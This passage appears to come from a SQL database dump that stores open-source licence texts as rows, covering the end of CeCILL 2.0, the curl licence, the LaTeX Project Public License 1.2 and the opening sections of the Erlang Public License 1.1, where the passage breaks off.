subsequent redistributions.\n\nIn consideration of access to the source code and the rights to copy, modify\nand redistribute granted by the license, users are provided only with a limited\nwarranty and the software\'s author, the holder of the economic rights, and\nthe successive licensors only have limited liability.\n\nIn this respect, the risks associated with loading, using, modifying and/or\ndeveloping or reproducing the software by the user are brought to the user\'s\nattention, given its Free Software status, which may make it complicated to\nuse, with the result that its use is reserved for developers and experienced\nprofessionals having in-depth computer knowledge. Users are therefore encouraged\nto load and test the suitability of the software as regards their requirements\nin conditions enabling the security of their systems and/or data to be ensured\nand, more generally, to use and operate it in the same conditions of security.\nThis Agreement may be freely reproduced and published, provided it is not\naltered, and that no provisions are either added or removed herefrom.\n\nThis Agreement may apply to any or all software for which the holder of the\neconomic rights decides to submit the use thereof to its provisions.\n\n Article 1 - DEFINITIONS\n\nFor the purpose of this Agreement, when the following expressions commence\nwith a capital letter, they shall have the following meaning:\n\n \n\nAgreement: means this license agreement, and its possible subsequent versions\nand annexes.\n\n \n\nSoftware: means the software in its Object Code and/or Source Code form and,\nwhere applicable, its documentation, \"as is\" when the Licensee accepts the\nAgreement.\n\n \n\nInitial Software: means the Software in its Source Code and possibly its Object\nCode form and, where applicable, its documentation, \"as is\" when it is first\ndistributed under the terms and conditions of the Agreement.\n\n \n\nModified Software: means the Software modified by at least one Contribution.\n\n \n\nSource Code: means all the Software\'s instructions and program lines to which\naccess is required so as to modify the Software.\n\n \n\nObject Code: means the binary files originating from the compilation of the\nSource Code.\n\n \n\nHolder: means the holder(s) of the economic rights over the Initial Software.\n\n \n\n Licensee: means the Software user(s) having accepted the Agreement.\n\n \n\n Contributor: means a Licensee having made at least one Contribution.\n\n \n\nLicensor: means the Holder, or any other individual or legal entity, who distributes\nthe Software under the Agreement.\n\n \n\nContribution: means any or all modifications, corrections, translations, adaptations\nand/or new functions integrated into the Software by any or all Contributors,\nas well as any or all Internal Modules.\n\n \n\nModule: means a set of sources files including their documentation that enables\nsupplementary functions or services in addition to those offered by the Software.\n\n \n\nExternal Module: means any or all Modules, not derived from the Software,\nso that this Module and the Software run in separate address spaces, with\none calling the other when they are run.\n\n \n\nInternal Module: means any or all Module, connected to the Software so that\nthey both execute in the same address space.\n\n \n\nGNU GPL: means the GNU General Public License version 2 or any subsequent\nversion, as published by the Free Software Foundation Inc.\n\n \n\n Parties: mean both the Licensee and the Licensor.\n\n These expressions may be used both in singular and plural form.\n\n Article 2 - PURPOSE\n\nThe purpose of the Agreement is the grant by the Licensor to the Licensee\nof a non-exclusive, transferable and worldwide license for the Software as\nset forth in Article 5 hereinafter for the whole term of the protection granted\nby the rights over said Software.\n\n Article 3 - ACCEPTANCE\n\n3.1 The Licensee shall be deemed as having accepted the terms and conditions\nof this Agreement upon the occurrence of the first of the following events:\n\n(i) loading the Software by any or all means, notably, by downloading from\na remote server, or by loading from a physical medium;\n\n(ii) the first time the Licensee exercises any of the rights granted hereunder.\n\n3.2 One copy of the Agreement, containing a notice relating to the characteristics\nof the Software, to the limited warranty, and to the fact that its use is\nrestricted to experienced users has been provided to the Licensee prior to\nits acceptance as set forth in Article 3.1 hereinabove, and the Licensee hereby\nacknowledges that it has read and understood it.\n\n Article 4 - EFFECTIVE DATE AND TERM\n\n 4.1 EFFECTIVE DATE\n\nThe Agreement shall become effective on the date when it is accepted by the\nLicensee as set forth in Article 3.1.\n\n 4.2 TERM\n\nThe Agreement shall remain in force for the entire legal term of protection\nof the economic rights over the Software.\n\n Article 5 - SCOPE OF RIGHTS GRANTED\n\nThe Licensor hereby grants to the Licensee, who accepts, the following rights\nover the Software for any or all use, and for the term of the Agreement, on\nthe basis of the terms and conditions set forth hereinafter.\n\nBesides, if the Licensor owns or comes to own one or more patents protecting\nall or part of the functions of the Software or of its components, the Licensor\nundertakes not to enforce the rights granted by these patents against successive\nLicensees using, exploiting or modifying the Software. If these patents are\ntransferred, the Licensor undertakes to have the transferees subscribe to\nthe obligations set forth in this paragraph.\n\n 5.1 RIGHT OF USE\n\nThe Licensee is authorized to use the Software, without any limitation as\nto its fields of application, with it being hereinafter specified that this\ncomprises:\n\n1. permanent or temporary reproduction of all or part of the Software by any\nor all means and in any or all form.\n\n2. loading, displaying, running, or storing the Software on any or all medium.\n\n3. entitlement to observe, study or test its operation so as to determine\nthe ideas and principles behind any or all constituent elements of said Software.\nThis shall apply when the Licensee carries out any or all loading, displaying,\nrunning, transmission or storage operation as regards the Software, that it\nis entitled to carry out hereunder.\n\n 5.2 ENTITLEMENT TO MAKE CONTRIBUTIONS\n\nThe right to make Contributions includes the right to translate, adapt, arrange,\nor make any or all modifications to the Software, and the right to reproduce\nthe resulting software.\n\nThe Licensee is authorized to make any or all Contributions to the Software\nprovided that it includes an explicit notice that it is the author of said\nContribution and indicates the date of the creation thereof.\n\n 5.3 RIGHT OF DISTRIBUTION\n\nIn particular, the right of distribution includes the right to publish, transmit\nand communicate the Software to the general public on any or all medium, and\nby any or all means, and the right to market, either in consideration of a\nfee, or free of charge, one or more copies of the Software by any means.\n\nThe Licensee is further authorized to distribute copies of the modified or\nunmodified Software to third parties according to the terms and conditions\nset forth hereinafter.\n\n 5.3.1. DISTRIBUTION OF SOFTWARE WITHOUT MODIFICATION\n\nThe Licensee is authorized to distribute true copies of the Software in Source\nCode or Object Code form, provided that said distribution complies with all\nthe provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the Object Code of the Software is redistributed,\nthe Licensee allows future Licensees unhindered access to the full Source\nCode of the Software by indicating how to access it, it being understood that\nthe additional cost of acquiring the Source Code shall not exceed the cost\nof transferring the data.\n\n 5.3.2. DISTRIBUTION OF MODIFIED SOFTWARE\n\nWhen the Licensee makes a Contribution to the Software, the terms and conditions\nfor the distribution of the resulting Modified Software become subject to\nall the provisions of this Agreement.\n\nThe Licensee is authorized to distribute the Modified Software, in source\ncode or object code form, provided that said distribution complies with all\nthe provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the object code of the Modified Software\nis redistributed, the Licensee allows future Licensees unhindered access to\nthe full source code of the Modified Software by indicating how to access\nit, it being understood that the additional cost of acquiring the source code\nshall not exceed the cost of transferring the data.\n\n 5.3.3. DISTRIBUTION OF EXTERNAL MODULES\n\nWhen the Licensee has developed an External Module, the terms and conditions\nof this Agreement do not apply to said External Module, that may be distributed\nunder a separate license agreement.\n\n 5.3.4. COMPATIBILITY WITH THE GNU GPL\n\nThe Licensee can include a code that is subject to the provisions of one of\nthe versions of the GNU GPL in the Modified or unmodified Software, and distribute\nthat entire code under the terms of the same version of the GNU GPL.\n\nThe Licensee can include the Modified or unmodified Software in a code that\nis subject to the provisions of one of the versions of the GNU GPL, and distribute\nthat entire code under the terms of the same version of the GNU GPL.\n\n Article 6 - INTELLECTUAL PROPERTY\n\n 6.1 OVER THE INITIAL SOFTWARE\n\nThe Holder owns the economic rights over the Initial Software. Any or all\nuse of the Initial Software is subject to compliance with the terms and conditions\nunder which the Holder has elected to distribute its work and no one shall\nbe entitled to modify the terms and conditions for the distribution of said\nInitial Software.\n\nThe Holder undertakes that the Initial Software will remain ruled at least\nby this Agreement, for the duration set forth in Article 4.2.\n\n 6.2 OVER THE CONTRIBUTIONS\n\nThe Licensee who develops a Contribution is the owner of the intellectual\nproperty rights over this Contribution as defined by applicable law.\n\n 6.3 OVER THE EXTERNAL MODULES\n\nThe Licensee who develops an External Module is the owner of the intellectual\nproperty rights over this External Module as defined by applicable law and\nis free to choose the type of agreement that shall govern its distribution.\n\n 6.4 JOINT PROVISIONS\n\n The Licensee expressly undertakes:\n\n1. not to remove, or modify, in any manner, the intellectual property notices\nattached to the Software;\n\n2. to reproduce said notices, in an identical manner, in the copies of the\nSoftware modified or not.\n\nThe Licensee undertakes not to directly or indirectly infringe the intellectual\nproperty rights of the Holder and/or Contributors on the Software and to take,\nwhere applicable, vis-à-vis its staff, any and all measures required to ensure\nrespect of said intellectual property rights of the Holder and/or Contributors.\n\n Article 7 - RELATED SERVICES\n\n7.1 Under no circumstances shall the Agreement oblige the Licensor to provide\ntechnical assistance or maintenance services for the Software.\n\nHowever, the Licensor is entitled to offer this type of services. The terms\nand conditions of such technical assistance, and/or such maintenance, shall\nbe set forth in a separate instrument. Only the Licensor offering said maintenance\nand/or technical assistance services shall incur liability therefor.\n\n7.2 Similarly, any Licensor is entitled to offer to its licensees, under its\nsole responsibility, a warranty, that shall only be binding upon itself, for\nthe redistribution of the Software and/or the Modified Software, under terms\nand conditions that it is free to decide. Said warranty, and the financial\nterms and conditions of its application, shall be subject of a separate instrument\nexecuted between the Licensor and the Licensee.\n\n Article 8 - LIABILITY\n\n8.1 Subject to the provisions of Article 8.2, the Licensee shall be entitled\nto claim compensation for any direct loss it may have suffered from the Software\nas a result of a fault on the part of the relevant Licensor, subject to providing\nevidence thereof.\n\n8.2 The Licensor\'s liability is limited to the commitments made under this\nAgreement and shall not be incurred as a result of in particular: (i) loss\ndue the Licensee\'s total or partial failure to fulfill its obligations, (ii)\ndirect or consequential loss that is suffered by the Licensee due to the use\nor performance of the Software, and (iii) more generally, any consequential\nloss. In particular the Parties expressly agree that any or all pecuniary\nor business loss (i.e. loss of data, loss of profits, operating loss, loss\nof customers or orders, opportunity cost, any disturbance to business activities)\nor any or all legal proceedings instituted against the Licensee by a third\nparty, shall constitute consequential loss and shall not provide entitlement\nto any or all compensation from the Licensor.\n\n Article 9 - WARRANTY\n\n9.1 The Licensee acknowledges that the scientific and technical state-of-the-art\nwhen the Software was distributed did not enable all possible uses to be tested\nand verified, nor for the presence of possible defects to be detected. In\nthis respect, the Licensee\'s attention has been drawn to the risks associated\nwith loading, using, modifying and/or developing and reproducing the Software\nwhich are reserved for experienced users.\n\nThe Licensee shall be responsible for verifying, by any or all means, the\nsuitability of the product for its requirements, its good working order, and\nfor ensuring that it shall not cause damage to either persons or properties.\n\n9.2 The Licensor hereby represents, in good faith, that it is entitled to\ngrant all the rights over the Software (including in particular the rights\nset forth in Article 5).\n\n9.3 The Licensee acknowledges that the Software is supplied \"as is\" by the\nLicensor without any other express or tacit warranty, other than that provided\nfor in Article 9.2 and, in particular, without any warranty as to its commercial\nvalue, its secured, safe, innovative or relevant nature.\n\nSpecifically, the Licensor does not warrant that the Software is free from\nany error, that it will operate without interruption, that it will be compatible\nwith the Licensee\'s own equipment and software configuration, nor that it\nwill meet the Licensee\'s requirements.\n\n9.4 The Licensor does not either expressly or tacitly warrant that the Software\ndoes not infringe any third party intellectual property right relating to\na patent, software or any other property right. Therefore, the Licensor disclaims\nany and all liability towards the Licensee arising out of any or all proceedings\nfor infringement that may be instituted in respect of the use, modification\nand redistribution of the Software. Nevertheless, should such proceedings\nbe instituted against the Licensee, the Licensor shall provide it with technical\nand legal assistance for its defense. Such technical and legal assistance\nshall be decided on a case-by-case basis between the relevant Licensor and\nthe Licensee pursuant to a memorandum of understanding. The Licensor disclaims\nany and all liability as regards the Licensee\'s use of the name of the Software.\nNo warranty is given as regards the existence of prior rights over the name\nof the Software or as regards the existence of a trademark.\n\n Article 10 - TERMINATION\n\n10.1 In the event of a breach by the Licensee of its obligations hereunder,\nthe Licensor may automatically terminate this Agreement thirty (30) days after\nnotice has been sent to the Licensee and has remained ineffective.\n\n10.2 A Licensee whose Agreement is terminated shall no longer be authorized\nto use, modify or distribute the Software. However, any licenses that it may\nhave granted prior to termination of the Agreement shall remain valid subject\nto their having been granted in compliance with the terms and conditions hereof.\n\n Article 11 - MISCELLANEOUS\n\n 11.1 EXCUSABLE EVENTS\n\nNeither Party shall be liable for any or all delay, or failure to perform\nthe Agreement, that may be attributable to an event of force majeure, an act\nof God or an outside cause, such as defective functioning or interruptions\nof the electricity or telecommunications networks, network paralysis following\na virus attack, intervention by government authorities, natural disasters,\nwater damage, earthquakes, fire, explosions, strikes and labor unrest, war,\netc.\n\n11.2 Any failure by either Party, on one or more occasions, to invoke one\nor more of the provisions hereof, shall under no circumstances be interpreted\nas being a waiver by the interested Party of its right to invoke said provision(s)\nsubsequently.\n\n11.3 The Agreement cancels and replaces any or all previous agreements, whether\nwritten or oral, between the Parties and having the same purpose, and constitutes\nthe entirety of the agreement between said Parties concerning said purpose.\nNo supplement or modification to the terms and conditions hereof shall be\neffective as between the Parties unless it is made in writing and signed by\ntheir duly authorized representatives.\n\n11.4 In the event that one or more of the provisions hereof were to conflict\nwith a current or future applicable act or legislative text, said act or legislative\ntext shall prevail, and the Parties shall make the necessary amendments so\nas to comply with said act or legislative text. All other provisions shall\nremain effective. Similarly, invalidity of a provision of the Agreement, for\nany reason whatsoever, shall not cause the Agreement as a whole to be invalid.\n\n 11.5 LANGUAGE\n\nThe Agreement is drafted in both French and English and both versions are\ndeemed authentic.\n\n Article 12 - NEW VERSIONS OF THE AGREEMENT\n\n12.1 Any person is authorized to duplicate and distribute copies of this Agreement.\n\n12.2 So as to ensure coherence, the wording of this Agreement is protected\nand may only be modified by the authors of the License, who reserve the right\nto periodically publish updates or new versions of the Agreement, each with\na separate number. These subsequent versions may address new issues encountered\nby Free Software.\n\n12.3 Any Software distributed under a given version of the Agreement may only\nbe subsequently distributed under the same version of the Agreement or a subsequent\nversion, subject to the provisions of Article 5.3.4.\n\n Article 13 - GOVERNING LAW AND JURISDICTION\n\n13.1 The Agreement is governed by French law. The Parties agree to endeavor\nto seek an amicable solution to any disagreements or disputes that may arise\nduring the performance of the Agreement.\n\n13.2 Failing an amicable solution within two (2) months as from their occurrence,\nand unless emergency proceedings are necessary, the disagreements or disputes\nshall be referred to the Paris Courts having jurisdiction, by the more diligent\nParty.\n\nVersion 2.0 dated 2006-09-05. 1 CeCILL stands for Ce(a) C(nrs) I(nria) L(ogiciel)\nL(ibre)\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(212,'curl','COPYRIGHT AND PERMISSION NOTICE\n\nCopyright (c) 1996 - 2015, Daniel Stenberg, <daniel@haxx.se>.\n\nAll rights reserved.\n\nPermission to use, copy, modify, and distribute this software for any purpose\nwith or without fee is hereby granted, provided that the above copyright notice\nand this permission notice appear in all copies.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. IN NO\nEVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES\nOR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n\nExcept as contained in this notice, the name of a copyright holder shall not\nbe used in advertising or otherwise to promote the sale, use or other dealings\nin this Software without prior written authorization of the copyright holder.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(213,'LPPL-1.2','The LaTeX Project Public License\n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\nLPPL Version 1.2 1999-09-03\n\nCopyright 1999 LaTeX3 Project\n\nEveryone is allowed to distribute verbatim copies of this license document,\nbut modification of it is not allowed.\n\nPREAMBLE\n\n========\n\nThe LaTeX Project Public License (LPPL) is the license under which the base\nLaTeX distribution is distributed.\n\nYou may use this license for any program that you have written and wish to\ndistribute. This license may be particularly suitable if your program is TeX-related\n(such as a LaTeX package), but you may use it even if your program is unrelated\nto TeX. The section `WHETHER AND HOW TO DISTRIBUTE PROGRAMS UNDER THIS LICENSE\',\nbelow, gives instructions, examples, and recommendations for authors who are\nconsidering distributing their programs under this license.\n\nIn this license document, `The Program\' refers to any program distributed\nunder this license.\n\nThis license gives conditions under which The Program may be distributed and\nconditions under which modified versions of The Program may be distributed.\nIndividual files of The Program may bear supplementary and/or superseding\nconditions on modification of themselves and on the distribution of modified\nversions of themselves, but *no* file of The Program may bear supplementary\nor superseding conditions on the distribution of an unmodified copy of the\nfile. A distributor wishing to distribute a complete, unmodified copy of The\nProgram therefore needs to check the conditions only in this license and nowhere\nelse.\n\nActivities other than distribution and/or modification of The Program are\nnot covered by this license; they are outside its scope. In particular, the\nact of running The Program is not restricted.\n\nWe, the LaTeX3 Project, believe that the conditions below give you the freedom\nto make and distribute modified versions of The Program that conform with\nwhatever technical specifications you wish while maintaining the availability,\nintegrity, and reliability of The Program. If you do not see how to achieve\nyour goal while meeting these conditions, then read the document `cfgguide.tex\'\nin the base LaTeX distribution for suggestions.\n\nCONDITIONS ON DISTRIBUTION AND MODIFICATION\n\n===========================================\n\nYou may distribute a complete, unmodified copy of The Program. Distribution\nof only part of The Program is not allowed.\n\nYou may not modify in any way a file of The Program that bears a legal notice\nforbidding modification of that file.\n\nYou may distribute a modified file of The Program if, and only if, the following\neight conditions are met:\n\n1. You must meet any additional conditions borne by the file on the distribution\nof a modified version of the file as described below in the subsection `Additional\nConditions on Individual Files of The Program\'.\n\n2. If the file is a LaTeX software file, then you must meet any applicable\nadditional conditions on the distribution of a modified version of the file\nthat are described below in the subsection `Additional Conditions on LaTeX\nSoftware Files\'.\n\n3. You must not distribute the modified file with the filename of the original\nfile.\n\n4. In the modified file, you must acknowledge the authorship and name of the\noriginal file, and the name (if any) of the program which contains it.\n\n5. You must change any identification string in the file to indicate clearly\nthat the modified file is not part of The Program.\n\n6. You must change any addresses in the modified file for the reporting of\nerrors in the file or in The Program generally to ensure that reports for\nfiles no longer maintained by the original maintainers will be directed to\nthe maintainers of the modified files.\n\n7. You must distribute the modified file under a license that forbids distribution\nboth of the modified file and of any files derived from the modified file\nwith the filename of the original file.\n\n 8. You must do either (A) or (B):\n\n(A) distribute a copy of The Program (that is, a complete, unmodified copy\nof The Program) together with the modified file; if your distribution of the\nmodified file is made by offering access to copy the modified file from a\ndesignated place, then offering equivalent access to copy The Program from\nthe same place meets this condition, even though third parties are not compelled\nto copy The Program along with the modified file;\n\n(B) provide to those who receive the modified file information that is sufficient\nfor them to obtain a copy of The Program; for example, you may provide a Uniform\nResource Locator (URL) for a site that you expect will provide them with a\ncopy of The Program free of charge (either the version from which your modification\nis derived, or perhaps a later version).\n\nNote that in the above, `distribution\' of a file means making the file available\nto others by any means. This includes, for instance, installing the file on\nany machine in such a way that the file is accessible by users other than\nyourself. `Modification\' of a file means any procedure that produces a derivative\nfile under any applicable law -- that is, a file containing the original file\nor a significant portion of it, either verbatim or with modifications and/or\ntranslated into another language.\n\nChanging the name of a file (other than as necessitated by the file conventions\nof the target file systems) is considered to be a modification of the file.\n\nThe distribution conditions in this license do not have to be applied to files\nthat have been modified in accordance with the above conditions. Note, however,\nthat Condition 7. does apply to any such modified file.\n\nThe conditions above are not intended to prohibit, and hence do not apply\nto, the updating, by any method, of a file so that it becomes identical to\nthe latest version of that file of The Program.\n\nA Recommendation on Modification Without Distribution -----------------------------------------------------\n\nIt is wise never to modify a file of The Program, even for your own personal\nuse, without also meeting the above eight conditions for distributing the\nmodified file. While you might intend that such modified files will never\nbe distributed, often this will happen by accident -- you may forget that\nyou have modified the file; or it may not occur to you when allowing others\nto access the modified file that you are thus distributing it and violating\nthe conditions of this license. It is usually in your best interest to keep\nyour copy of The Program identical with the public one. Many programs provide\nways to control the behavior of that program without altering its licensed\nfiles.\n\nAdditional Conditions on Individual Files of The Program --------------------------------------------------------\n\nAn individual file of The Program may bear additional conditions that supplement\nand/or supersede the conditions in this license if, and only if, such additional\nconditions exclusively concern modification of the file or distribution of\na modified version of the file. The conditions on individual files of The\nProgram therefore may differ only with respect to the kind and extent of modification\nof those files that is allowed, and with respect to the distribution of modified\nversions of those files.\n\nAdditional Conditions on LaTeX Software Files\n\n---------------------------------------------\n\nIf a file of The Program is intended to be used with LaTeX (that is, if it\nis a LaTeX software file), then the following additional conditions, which\nsupplement and/or supersede the conditions above, apply to the file according\nto its filename extension:\n\n- You may not modify any file with filename extension `.ins\' since these are\ninstallation files containing the legal notices that are placed in the files\nthey generate.\n\n- You may distribute modified versions of files with filename extension `.fd\'\n(LaTeX font definition files) under the standard conditions of the LPPL as\ndescribed above. You may also distribute such modified LaTeX font definition\nfiles with their original names provided that:\n\n(1) the only changes to the original files either enable use of available\nfonts or prevent attempts to access unavailable fonts;\n\n(2) you also distribute the original, unmodified files (TeX input paths can\nbe used to control which set of LaTeX font definition files is actually used\nby TeX).\n\n- You may distribute modified versions of files with filename extension `.cfg\'\n(configuration files) with their original names. The Program may (and usually\nwill) specify the range of commands that are allowed in a particular configuration\nfile.\n\nBecause of portability and exchangeability issues in LaTeX software, The LaTeX3\nProject deprecates the distribution of modified versions of components of\nLaTeX or of generally available contributed code for them, but such distribution\ncan meet the conditions of this license.\n\nNO WARRANTY\n\n===========\n\nThere is no warranty for The Program. Except when otherwise stated in writing,\nThe Copyright Holder provides The Program `as is\', without warranty of any\nkind, either expressed or implied, including, but not limited to, the implied\nwarranties of merchantability and fitness for a particular purpose. The entire\nrisk as to the quality and performance of The Program is with you. Should\nThe Program prove defective, you assume the cost of all necessary servicing,\nrepair, or correction.\n\nIn no event unless agreed to in writing will The Copyright Holder, or any\nauthor named in the files of The Program, or any other party who may distribute\nand/or modify The Program as permitted above, be liable to you for damages,\nincluding any general, special, incidental or consequential damages arising\nout of any use of The Program or out of inability to use The Program (including,\nbut not limited to, loss of data, data being rendered inaccurate, or losses\nsustained by anyone as a result of any failure of The Program to operate with\nany other programs), even if The Copyright Holder or said author or said other\nparty has been advised of the possibility of such damages.\n\nWHETHER AND HOW TO DISTRIBUTE PROGRAMS UNDER THIS LICENSE =========================================================\n\nThis section contains important instructions, examples, and recommendations\nfor authors who are considering distributing their programs under this license.\nThese authors are addressed as `you\' in this section.\n\nChoosing This License or Another License\n\n----------------------------------------\n\nIf for any part of your program you want or need to use *distribution* conditions\nthat differ from those in this license, then do not refer to this license\nanywhere in your program but instead distribute your program under a different\nlicense. You may use the text of this license as a model for your own license,\nbut your license should not refer to the LPPL or otherwise give the impression\nthat your program is distributed under the LPPL.\n\nThe document `modguide.tex\' in the base LaTeX distribution explains the motivation\nbehind the conditions of this license. It explains, for example, why distributing\nLaTeX under the GNU General Public License (GPL) was considered inappropriate.\nEven if your program is unrelated to LaTeX, the discussion in `modguide.tex\'\nmay still be relevant, and authors intending to distribute their programs\nunder any license are encouraged to read it.\n\nHow to Use This License\n\n-----------------------\n\nTo use this license, place in each of the files of your program both an explicit\ncopyright notice including your name and the year and also a statement that\nthe distribution and/or modification of the file is constrained by the conditions\nin this license.\n\nHere is an example of such a notice and statement:\n\n%% pig.dtx\n\n%% Copyright 2001 M. Y. Name\n\n%\n\n% This program may be distributed and/or modified under the\n\n% conditions of the LaTeX Project Public License, either version 1.2\n\n% of this license or (at your option) any later version.\n\n% The latest version of this license is in\n\n% http://www.latex-project.org/lppl.txt\n\n% and version 1.2 or later is part of all distributions of LaTeX\n\n% version 1999/12/01 or later.\n\n%\n\n% This program consists of the files pig.dtx and pig.ins\n\nGiven such a notice and statement in a file, the conditions given in this\nlicense document would apply, with `The Program\' referring to the two files\n`pig.dtx\' and `pig.ins\', and `The Copyright Holder\' referring to the person\n`M. Y. Name\'.\n\nImportant Recommendations\n\n-------------------------\n\nDefining What Constitutes The Program\n\nThe LPPL requires that distributions of The Program contain all the files\nof The Program. It is therefore important that you provide a way for the licensee\nto determine which files constitute The Program. This could, for example,\nbe achieved by explicitly listing all the files of The Program near the copyright\nnotice of each file or by using a line like\n\n% This program consists of all files listed in manifest.txt.\n\nin that place. In the absence of an unequivocal list it might be impossible\nfor the licensee to determine what is considered by you to comprise The Program.\n\nNoting Exceptional Files If The Program contains any files bearing additional\nconditions on modification, or on distribution of modified versions, of those\nfiles (other than those listed in `Additional Conditions on LaTeX Software\nFiles\'), then it is recommended that The Program contain a prominent file\nthat defines the exceptional conditions, and either lists the exceptional\nfiles or defines one or more categories of exceptional files.\n\nFiles containing the text of a license (such as this file) are often examples\nof files bearing more restrictive conditions on modification. LaTeX configuration\nfiles (with filename extension `.cfg\') are examples of files bearing less\nrestrictive conditions on the distribution of a modified version of the file.\nThe additional conditions on LaTeX software given above are examples of declaring\na category of files bearing exceptional additional conditions.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(214,'ErlPL-1.1','ERLANG PUBLIC LICENSE Version 1.1\n\n 1. Definitions.\n\n1.1. ``Contributor\'\' means each entity that creates or contributes to the\ncreation of Modifications.\n\n1.2. ``Contributor Version\'\' means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. ``Covered Code\'\' means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. ``Electronic Distribution Mechanism\'\' means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n1.5. ``Executable\'\' means Covered Code in any form other than Source Code.\n\n1.6. ``Initial Developer\'\' means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. ``Larger Work\'\' means a work which combines Covered Code or portions\nthereof with code not governed by the terms of this License.\n\n 1.8. ``License\'\' means this document.\n\n1.9. ``Modifications\'\' means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. ``Original Code\'\' means Source Code of computer software code which\nis described in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.11. ``Source Code\'\' means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or a list of source code differential comparisons against\neither the Original Code or another well known, available Covered Code of\nthe Contributor\'s choice. The Source Code can be in a compressed or archival\nform, provided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n1.12. ``You\'\' means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License. For legal entities,\n``You\'\' includes any entity which controls, is controlled by, or is under\ncommon control with You. For purposes of this definition, ``control\'\' means\n(a) the power, direct or indirect, to cause the direction or management of\nsuch entity, whether by contract or otherwise, or (b) ownership of fifty percent\n(50%) or more of the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license, subject to third party\nintellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Original Code (or portions thereof) with or without Modifications, or\nas part of a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Initial Developer,\nto make, have made, use and sell (``Utilize\'\') the Original Code (or portions\nthereof), but solely to the extent that any such patent is reasonably necessary\nto enable You to Utilize the Original Code (or portions thereof) and not to\nany greater extent that may be necessary to Utilize further Modifications\nor combinations.\n\n2.2. Contributor Grant. Each Contributor hereby grants You a world-wide, royalty-free,\nnon-exclusive license, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Modifications created by such Contributor (or portions thereof) either\non an unmodified basis, with other Modifications, as Covered Code or as part\nof a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Contributor, to\nUtilize the Contributor Version (or portions thereof), but solely to the extent\nthat any such patent is reasonably necessary to enable You to Utilize the\nContributor Version (or portions thereof), and not to any greater extent that\nmay be necessary to Utilize further Modifications or combinations.\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You contribute are governed\nby the terms of this License, including without limitation Section 2.2. The\nSource Code version of Covered Code may be distributed only under the terms\nof this License, and You must include a copy of this License with every copy\nof the Source Code You distribute. You may not offer or impose any terms on\nany Source Code version that alters or restricts the applicable version of\nthis License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You contribute must\nbe made available in Source Code form under the terms of this License either\non the same media as an Executable version or via an accepted Electronic Distribution\nMechanism to anyone to whom you made an Executable version available; and\nif made available via Electronic Distribution Mechanism, must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of that particular Modification\nhas been made available to such recipients. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nyou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n(a) Third Party Claims. If You have knowledge that a party claims an intellectual\nproperty right in particular functionality or code (or its utilization under\nthis License), you must include a text file with the source code distribution\ntitled ``LEGAL\'\' which describes the claim and the party making the claim\nin sufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after You make Your Modification available as described in\nSection 3.2, You shall promptly modify the LEGAL file in all copies You make\navailable thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Covered Code that new knowledge has been obtained.\n\n(b) Contributor APIs. If Your Modification is an application programming interface\nand You own or control patents which are reasonably necessary to implement\nthat API, you must also include this information in the LEGAL file.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code, and this License in any documentation for the Source\nCode, where You describe recipients\' rights relating to Covered Code. If You\ncreated one or more Modification(s), You may add your name as a Contributor\nto the notice described in 